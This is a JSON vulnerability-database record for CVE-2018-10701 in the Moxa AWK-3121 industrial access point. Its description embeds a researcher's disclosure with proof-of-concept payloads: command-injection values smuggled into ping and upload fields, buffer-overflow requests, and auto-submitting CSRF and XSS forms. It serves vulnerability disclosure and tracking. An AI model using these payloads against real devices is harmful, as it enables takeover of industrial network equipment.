"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10701",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120487",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10701",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10701",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-329",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120487",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10701",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120487"
},
{
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"db": "NVD",
"id": "CVE-2018-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter \"iw_filename\" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. Moxa AWK-3121 There is a buffer error vulnerability in the \u0027iw_filename\u0027 parameter in version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10701"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"db": "VULHUB",
"id": "VHN-120487"
},
{
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10701",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-329",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120487",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10701",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120487"
},
{
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
]
},
"id": "VAR-201906-0791",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120487"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.679000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120487"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"db": "NVD",
"id": "CVE-2018-10701"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10701"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120487"
},
{
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120487"
},
{
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120487"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"date": "2019-06-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.717000",
"db": "NVD",
"id": "CVE-2018-10701"
},
{
